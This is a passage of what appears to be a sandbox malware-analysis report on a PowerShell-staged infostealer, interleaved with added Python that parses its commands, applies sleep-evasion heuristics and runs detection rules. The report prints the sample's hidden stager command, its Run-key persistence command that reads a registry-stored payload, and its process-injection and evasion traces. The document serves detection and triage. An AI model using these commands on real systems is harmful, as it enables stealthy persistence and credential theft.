            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Code function: 17_2_0044693D push ecx; ret 17_2_0044694D
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Code function: 17_2_0044DB70 push eax; ret 17_2_0044DB84
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Code function: 17_2_0044DB70 push eax; ret 17_2_0044DBAC
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Code function: 17_2_00451D54 push eax; ret 17_2_00451D61
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Code function: 18_2_0044B090 push eax; ret 18_2_0044B0A4
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Code function: 18_2_0044B090 push eax; ret 18_2_0044B0CC
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Code function: 18_2_00451D34 push eax; ret 18_2_00451D41
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Code function: 18_2_00444E71 push ecx; ret 18_2_00444E81
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Code function: 19_2_00414060 push eax; ret 19_2_00414074
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Code function: 19_2_00414060 push eax; ret 19_2_0041409C
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Code function: 19_2_00414039 push ecx; ret 19_2_00414049
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Code function: 19_2_004164EB push 0000006Ah; retf 19_2_004165C4
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Code function: 19_2_00416553 push 0000006Ah; retf 19_2_004165C4
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Code function: 19_2_00416555 push 0000006Ah; retf 19_2_004165C4
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\euthanasic\satineredes\Gammastraales\Ekspertenhed\plyndrer\SecuriteInfo.com.FileRepMalware.12793.28433.exe
            Source: C:\Windows\SysWOW64\reg.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Markedsandel (2 occurrences)
            Source: C:\Program Files (x86)\Windows Mail\wabmig.exe Code function: 18_2_004047CB LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 18_2_004047CB
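Two artifacts in this section decide how the triage has to be done. The stager command line never contains the script: it reads the dropped Skeletonlike.pas into a string, takes the 3 characters at offset 54300, and hands that token to the call operator (`.$Folkedyb(...)`), so whatever command name sits at that offset runs with the whole file as its argument; the AMSI captures above (GetDelegateForFunctionPointer, DefineDynamicAssembly) are what that file does once it runs, building delegates by reflection to call native APIs without Add-Type. The persistence is split the same way: the Run value is REG_EXPAND_SZ, so %Rykningspaategningens% is stored unexpanded and only resolved at logon, and the script body it runs is read back from the registry value Batikker under HKCU:\kompositioner\. Neither the Run value nor the command line shows the interpreter or the payload, so an analyst must collect the environment variable and that registry value as well, and the report shows neither. The script below is an added example, not Joe Sandbox code: it parses both command lines into the pieces that must be collected, and simulates the logon-time expansion. FAKE_SCRIPT and ASSUMED_ENV are constructed stand-ins (the real file content and variable value are not in the report); the assumption that the .pas file is a single line, so Get-Content yields one string, is likewise the example's, not the report's.

```python
"""Triage of the two PowerShell artifacts in the Data Obfuscation section.

Added example, not Joe Sandbox code. STAGER and REG_ADD are transcribed
from the report; FAKE_SCRIPT and ASSUMED_ENV are constructed stand-ins,
because the report shows neither the dropped .pas file's content nor the
value of %Rykningspaategningens%.
"""
import re

STAGER = r'''"powershell.exe" -windowstyle hidden "$Semiexpositive=Get-Content 'C:\Users\user\AppData\Roaming\euthanasic\satineredes\Gammastraales\Skeletonlike.pas';$Folkedyb=$Semiexpositive.SubString(54300,3);.$Folkedyb($Semiexpositive)"'''
REG_ADD = r'''REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Markedsandel" /t REG_EXPAND_SZ /d "%Rykningspaategningens% -windowstyle minimized $Unbaked=(Get-ItemProperty -Path 'HKCU:\kompositioner\').Batikker;%Rykningspaategningens% ($Unbaked)"'''

# Constructed: a one-line blob with the alias "iex" at offset 54300 (assumption; the
# report does not show the file). Single line => Get-Content returns one string.
FAKE_SCRIPT = ("-" * 54300) + "iex" + " ($payload)"
# Constructed: assumes the variable points at the 32-bit PowerShell host.
ASSUMED_ENV = {"Rykningspaategningens": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"}

# $buf = Get-Content '<path>'; $cmd = $buf.SubString(<off>,<len>); .$cmd($buf)
STAGER_RE = re.compile(
    r"\$(?P<buf>\w+)\s*=\s*Get-Content\s+'(?P<path>[^']+)'\s*;"
    r"\s*\$(?P<cmd>\w+)\s*=\s*\$(?P=buf)\.SubString\(\s*(?P<off>\d+)\s*,\s*(?P<len>\d+)\s*\)\s*;"
    r"\s*[.&]\s*\$(?P=cmd)\s*\(\s*\$(?P=buf)\s*\)", re.I)
REG_ADD_RE = re.compile(r"\bREG\s+ADD\s+(?P<key>\S+)(?P<rest>.*)$", re.I | re.S)
OPT_RE = re.compile(r'/(?P<opt>[vtd])\s+(?:"(?P<q>[^"]*)"|(?P<u>\S+))', re.I)
ENV_RE = re.compile(r"%([^%\s]+)%")
ITEMPROP_RE = re.compile(r"Get-ItemProperty\s+-Path\s+'([^']+)'\)\.(\w+)", re.I)


def parse_stager(cmdline):
    """File path and the (offset, length) slice the stager invokes as a command, or None."""
    m = STAGER_RE.search(cmdline)
    if not m:
        return None
    return {"script_path": m["path"], "offset": int(m["off"]), "length": int(m["len"])}


def invoked_token(script_text, stager):
    """The characters the call operator would execute as a command name."""
    return script_text[stager["offset"]: stager["offset"] + stager["length"]]


def parse_reg_add(cmdline):
    """Structure a REG ADD persistence line into the IoCs an analyst must collect."""
    m = REG_ADD_RE.search(cmdline)
    if not m:
        return None
    opts = {o["opt"].lower(): o["q"] if o["q"] is not None else o["u"]
            for o in OPT_RE.finditer(m["rest"])}
    data = opts.get("d", "")
    return {
        "key": m["key"],
        "value_name": opts.get("v"),
        "type": (opts.get("t") or "REG_SZ").upper(),   # REG ADD defaults to REG_SZ
        "force": bool(re.search(r"\s/f(?:\s|$)", m["rest"], re.I)),
        "env_refs": sorted(set(ENV_RE.findall(data))),
        "registry_refs": ITEMPROP_RE.findall(data),     # (path, value name) pairs
        "data": data,
    }


def expand(data, env):
    """Expand %VAR% as ExpandEnvironmentStrings does for REG_EXPAND_SZ at logon;
    unknown variables stay literal, which is why the stored value looks inert."""
    return ENV_RE.sub(lambda m: env.get(m.group(1), m.group(0)), data)


def collection_list(stager, reg):
    """Everything that holds a piece of the payload and must be pulled before cleanup."""
    items = [stager["script_path"], f"{reg['key']}\\{reg['value_name']}"]
    items += [f"HKCU\\Environment\\{v} (assumed user-scoped; the report does not say)"
              for v in reg["env_refs"]]
    items += [f"{path}{name}" for path, name in reg["registry_refs"]]
    return items


if __name__ == "__main__":
    s, r = parse_stager(STAGER), parse_reg_add(REG_ADD)
    print("stager invokes:", invoked_token(FAKE_SCRIPT, s), "with", s["script_path"])
    print("Run value expands to:", expand(r["data"], ASSUMED_ENV))
    for item in collection_list(s, r):
        print("collect:", item)
```

The expansion helper is the practical point: with an empty environment the Run value comes back unchanged, which is exactly what a scanner sees when it reads the registry without resolving %Rykningspaategningens%; only with the variable set does it become a PowerShell launch. The same split explains why the report's "Powershell drops PE file" and Run-key signatures fire without any on-disk script being named in the command line.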
            Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.12793.28433.exe Process information set: NOOPENFILEERRORBOX (3 occurrences)
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX (68 occurrences)
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Process information set: NOOPENFILEERRORBOX (reported 28 times)

Malware Analysis System Evasion

Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | API/Special instruction interceptor: Address: 7056739
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Code function: 17_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 6064
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 3714
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Window / User API: threadDelayed 9699
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | API coverage: 9.5 %
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7140 | Thread sleep time: -4611686018427385s >= -30000s
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 4676 | Thread sleep count: 285 > 30
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 4676 | Thread sleep time: -855000s >= -30000s
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 4676 | Thread sleep count: 9699 > 30
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe TID: 4676 | Thread sleep time: -29097000s >= -30000s
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.12793.28433.exe | Code function: 5_2_0040595A GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.12793.28433.exe | Code function: 5_2_00402862 FindFirstFileW
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.12793.28433.exe | Code function: 5_2_0040658F FindFirstFileW,FindClose
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Code function: 12_2_232310F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Code function: 12_2_23236580 FindFirstFileExA
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Code function: 17_2_0040AE51 FindFirstFileW,FindNextFileW
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Code function: 18_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Code function: 19_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Code function: 17_2_00418981 memset,GetSystemInfo
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Roaming\euthanasic\satineredes\
Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\
Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\
Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Roaming\euthanasic\
Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Roaming\
Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Roaming\euthanasic\satineredes\Gammastraales\
Source: wabmig.exe, 0000000C.00000002.3760843591.0000000007719000.00000004.00000020.00020000.00000000.sdmp, wabmig.exe, 0000000C.00000002.3760843591.00000000076C9000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: wabmig.exe, 0000000C.00000002.3760843591.0000000007719000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW>
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.12793.28433.exe | API call chain: ExitProcess graph end node graph_5-3826
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.12793.28433.exe | API call chain: ExitProcess graph end node graph_5-3831
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | API call chain: ExitProcess graph end node graph_18-34076
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Process queried: DebugPort
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Code function: 12_2_23232639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Code function: 17_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Code function: 17_2_004044A4 LoadLibraryW,GetProcAddress,FreeLibrary,MessageBoxW
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Code function: 12_2_23234AB4 mov eax, dword ptr fs:[00000030h]
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Code function: 12_2_2323724E GetProcessHeap
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Process token adjusted: Debug
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Code function: 12_2_23232B1C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Code function: 12_2_23232639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Code function: 12_2_232360E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
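The "Thread sleep" lines above are the sandbox's two per-thread rules for sleep-based evasion: more than 30 sleep calls, or a cumulative delay beyond 30000. Although the report prints the totals with an "s" suffix, the figures behave as milliseconds (285 calls and 9699 calls give 855000 and 29097000, i.e. 3000 ms per call), and the powershell.exe "delay time" 922337203685477 equals INT64_MAX divided by 10000, which is what a relative NtDelayExecution timeout of the largest representable value converts to in milliseconds: an effectively infinite wait. The Python below is an added example, not part of the Joe Sandbox report or its engine; it converts a raw relative NT timeout to milliseconds and re-applies the two rules to constructed per-thread events. The 3000 ms per-call interval and both PIDs (3200 for wabmig.exe appears elsewhere in the report, 6024 for powershell.exe does not) are assumptions chosen to reproduce the reported totals.

```python
"""Sleep-based sandbox-evasion heuristics over constructed thread-delay events.

Added example, not part of the Joe Sandbox report. It reproduces the two
per-thread rules visible above ("Thread sleep count: N > 30" and
"Thread sleep time: -T >= -30000", with T a millisecond total despite the
"s" suffix) and converts a raw NtDelayExecution relative interval
(negative LARGE_INTEGER, 100 ns units) to milliseconds.
"""
from collections import defaultdict

INT64_MAX = 2**63 - 1
SLEEP_COUNT_LIMIT = 30         # report: "Thread sleep count: 285 > 30"
SLEEP_TOTAL_LIMIT_MS = 30_000  # report: "Thread sleep time: -855000s >= -30000s"


def nt_relative_interval_to_ms(interval: int) -> int:
    """Convert a relative NT timeout to milliseconds.

    NtDelayExecution takes a LARGE_INTEGER; a negative value is a relative
    delay in 100 ns units, so -10_000 is 1 ms. Positive values are absolute
    timestamps and are rejected here.
    """
    if interval >= 0:
        raise ValueError("absolute (positive) timeout, not a relative delay")
    return (-interval) // 10_000


def summarize_sleeps(events):
    """events: iterable of (pid, tid, delay_ms) -> {(pid, tid): (count, total_ms)}."""
    stats = defaultdict(lambda: [0, 0])
    for pid, tid, delay_ms in events:
        stats[(pid, tid)][0] += 1
        stats[(pid, tid)][1] += delay_ms
    return {key: tuple(val) for key, val in stats.items()}


def flag_sleep_evasion(events, count_limit=SLEEP_COUNT_LIMIT,
                       total_limit_ms=SLEEP_TOTAL_LIMIT_MS):
    """One finding per thread that breaks either rule. The rules are independent,
    so a handful of huge waits and thousands of tiny ones are both caught."""
    findings = []
    for (pid, tid), (count, total_ms) in sorted(summarize_sleeps(events).items()):
        reasons = []
        if count > count_limit:
            reasons.append(f"sleep count {count} > {count_limit}")
        if total_ms > total_limit_ms:
            reasons.append(f"sleep time {total_ms} ms > {total_limit_ms} ms")
        if reasons:
            findings.append((pid, tid, "; ".join(reasons)))
    return findings


# Constructed input modeled on the report's thread IDs. The 3000 ms per-call
# interval and both PIDs are assumptions chosen to reproduce the reported totals.
SAMPLE_EVENTS = (
    # wabmig.exe TID 4676: 9699 sleeps of 3000 ms = 29,097,000 ms ("-29097000s" above)
    [(3200, 4676, 3000)] * 9699
    # powershell.exe TID 7140: five relative waits of INT64_MAX (100 ns units),
    # 922337203685477 ms each; five of them sum to the reported 4611686018427385
    + [(6024, 7140, nt_relative_interval_to_ms(-INT64_MAX))] * 5
)

if __name__ == "__main__":
    for pid, tid, why in flag_sleep_evasion(SAMPLE_EVENTS):
        print(f"pid {pid} tid {tid}: {why}")
```

The count rule catches the wabmig.exe pattern (many short sleeps spread over a loop), the total rule catches the powershell.exe pattern (a few maximal waits); a detection that only looks at individual Sleep arguments misses the first, and one that only counts calls misses the second.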

HIPS / PFW / Operating System Protection Evasion

Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Section loaded: NULL target: C:\Program Files (x86)\Windows Mail\wabmig.exe protection: execute and read and write (reported 3 times)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Program Files (x86)\Windows Mail\wabmig.exe base: 3C60000
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Program Files (x86)\Windows Mail\wabmig.exe base: 5DF810
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Program Files (x86)\Windows Mail\wabmig.exe "C:\Program Files (x86)\windows mail\wabmig.exe"
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Markedsandel" /t REG_EXPAND_SZ /d "%Rykningspaategningens% -windowstyle minimized $Unbaked=(Get-ItemProperty -Path 'HKCU:\kompositioner\').Batikker;%Rykningspaategningens% ($Unbaked)"
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Process created: C:\Program Files (x86)\Windows Mail\wabmig.exe "C:\Program Files (x86)\windows mail\wabmig.exe" /stext "C:\Users\user\AppData\Local\Temp\coqd"
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Process created: C:\Program Files (x86)\Windows Mail\wabmig.exe "C:\Program Files (x86)\windows mail\wabmig.exe" /stext "C:\Users\user\AppData\Local\Temp\nivooon"
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Process created: C:\Program Files (x86)\Windows Mail\wabmig.exe "C:\Program Files (x86)\windows mail\wabmig.exe" /stext "C:\Users\user\AppData\Local\Temp\xkahpgyvtl"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Markedsandel" /t REG_EXPAND_SZ /d "%Rykningspaategningens% -windowstyle minimized $Unbaked=(Get-ItemProperty -Path 'HKCU:\kompositioner\').Batikker;%Rykningspaategningens% ($Unbaked)"
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Process created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" /c reg add hkcu\software\microsoft\windows\currentversion\run /f /v "markedsandel" /t reg_expand_sz /d "%rykningspaategningens% -windowstyle minimized $unbaked=(get-itemproperty -path 'hkcu:\kompositioner\').batikker;%rykningspaategningens% ($unbaked)"
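The process-creation lines above describe one chain. powershell.exe writes into wabmig.exe (a Windows Mail binary that PowerShell has no normal reason to start) and launches it; the injected wabmig.exe re-launches its own image three times with "/stext <tempfile>", the NirSoft save-report switch its password-recovery modules use; and it persists through cmd.exe and reg.exe by adding a Run value of type REG_EXPAND_SZ whose data is a PowerShell one-liner that expands an attacker-defined environment variable (the report does not show what %Rykningspaategningens% resolves to) and reads the real payload back out of HKCU:\kompositioner\ with Get-ItemProperty, so the Run value itself never contains the script. The Python below is an added example, not part of the report and not the Sigma rule it cites: three checks over constructed Sysmon-style process-creation events built from the lines above. The expected-parent list for the mail binaries and the allow-list of standard environment variables are assumptions for this example.

```python
"""Detections for the execution/persistence chain shown in the report, run over
constructed Sysmon-style process-creation events (added example, not report
or Sigma content). Three checks, each tied to a line above:
  1. wab.exe/wabmig.exe started by a parent other than the shell or a mail client.
  2. A process re-launching its own image with a NirSoft save switch (/stext ...).
  3. A Run value of type REG_EXPAND_SZ that expands a non-standard environment
     variable and pulls its payload back out of HKCU with Get-ItemProperty.
"""
import ntpath
import re

MAIL_CLIENT_IMAGES = {"wab.exe", "wabmig.exe"}
# Plausible launchers of the Windows Mail binaries; an assumption for this example.
EXPECTED_MAIL_PARENTS = {"explorer.exe", "msimn.exe", "outlook.exe"}
# Variables a Run value may legitimately expand; also an assumption for this example.
STANDARD_ENV_VARS = {
    "SYSTEMROOT", "WINDIR", "SYSTEMDRIVE", "PROGRAMFILES", "PROGRAMFILES(X86)", "PROGRAMDATA",
    "APPDATA", "LOCALAPPDATA", "USERPROFILE", "PUBLIC", "TEMP", "TMP", "COMSPEC",
}

REG_ADD_RE = re.compile(r"\breg(?:\.exe)?\s+add\s+(\S+)(.*)", re.I | re.S)
RUN_KEY_RE = re.compile(r"\\currentversion\\run(once)?\b", re.I)
TYPE_RE = re.compile(r"/t\s+(\S+)", re.I)
DATA_RE = re.compile(r'/d\s+"([^"]*)"', re.I)
ENV_REF_RE = re.compile(r"%([^%\s]+)%")
SAVE_SWITCH_RE = re.compile(r"\s/s(?:text|tab|comma|html|xml)\s+\S", re.I)  # NirSoft report switches


def image_name(path):
    return ntpath.basename(path).lower()


def check_unusual_mail_parent(ev):
    img, parent = image_name(ev["Image"]), image_name(ev["ParentImage"])
    if img in MAIL_CLIENT_IMAGES and parent not in EXPECTED_MAIL_PARENTS | MAIL_CLIENT_IMAGES:
        return f"{img} started by unusual parent {parent}"
    return None


def check_self_spawn_save_switch(ev):
    img = image_name(ev["Image"])
    if img == image_name(ev["ParentImage"]) and SAVE_SWITCH_RE.search(ev["CommandLine"]):
        return f"{img} re-launched itself with a NirSoft-style save switch"
    return None


def check_run_key_loader(ev):
    m = REG_ADD_RE.search(ev["CommandLine"])
    if not m or not RUN_KEY_RE.search(m.group(1)):
        return None
    key, rest = m.group(1), m.group(2)
    type_match, data_match = TYPE_RE.search(rest), DATA_RE.search(rest)
    if not data_match:
        return None
    data = data_match.group(1)
    reasons = []
    odd_vars = sorted({v for v in ENV_REF_RE.findall(data) if v.upper() not in STANDARD_ENV_VARS})
    if type_match and type_match.group(1).upper() == "REG_EXPAND_SZ" and odd_vars:
        reasons.append(f"REG_EXPAND_SZ data expands non-standard variable(s) {odd_vars}")
    if re.search(r"\bget-itemproperty\b.*\bhkcu:", data, re.I):
        reasons.append("value reads its payload back from HKCU via Get-ItemProperty")
    if not reasons:
        return None
    return f"Run key {key}: " + "; ".join(reasons)


def scan(events):
    """Returns (event_index, rule_name, message) for every rule that fires."""
    findings = []
    for i, ev in enumerate(events):
        for rule in (check_unusual_mail_parent, check_self_spawn_save_switch, check_run_key_loader):
            msg = rule(ev)
            if msg:
                findings.append((i, rule.__name__, msg))
    return findings


PS = r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
WABMIG = r"C:\Program Files (x86)\Windows Mail\wabmig.exe"
CMD = r"C:\Windows\SysWOW64\cmd.exe"
REG = r"C:\Windows\SysWOW64\reg.exe"
RUN_CMD = ('REG ADD HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /f /v "Markedsandel" '
           '/t REG_EXPAND_SZ /d "%Rykningspaategningens% -windowstyle minimized '
           "$Unbaked=(Get-ItemProperty -Path 'HKCU:\\kompositioner\\').Batikker;"
           '%Rykningspaategningens% ($Unbaked)"')
# Constructed from the "Process created" lines above; the last event is a benign control.
SAMPLE_EVENTS = [
    {"Image": WABMIG, "ParentImage": PS, "CommandLine": f'"{WABMIG}"'},
    {"Image": CMD, "ParentImage": WABMIG, "CommandLine": f'"C:\\Windows\\System32\\cmd.exe" /c {RUN_CMD}'},
    {"Image": WABMIG, "ParentImage": WABMIG,
     "CommandLine": f'"{WABMIG}" /stext "C:\\Users\\user\\AppData\\Local\\Temp\\coqd"'},
    {"Image": REG, "ParentImage": CMD, "CommandLine": RUN_CMD},
    {"Image": WABMIG, "ParentImage": r"C:\Windows\explorer.exe", "CommandLine": f'"{WABMIG}"'},
]

if __name__ == "__main__":
    for idx, rule_name, message in scan(SAMPLE_EVENTS):
        print(f"event {idx} [{rule_name}]: {message}")
```

The third check is the one worth keeping when hunting beyond this sample: a Run value that is REG_EXPAND_SZ, expands a variable the OS does not define, and reaches into another HKCU key for its content is a registry-resident loader regardless of which interpreter the variable resolves to.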
Source: wabmig.exe, 0000000C.00000002.3760957849.000000000772A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Manager
Source: wabmig.exe, 0000000C.00000002.3760843591.0000000007705000.00000004.00000020.00020000.00000000.sdmp, wabmig.exe, 0000000C.00000002.3760957849.000000000772A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: |Program Manager|
Source: C:\Program Files (x86)\Windows Mail\wabmig.exe | Code function: 12_2_23232933 cpuid
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation (reported 7 times)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
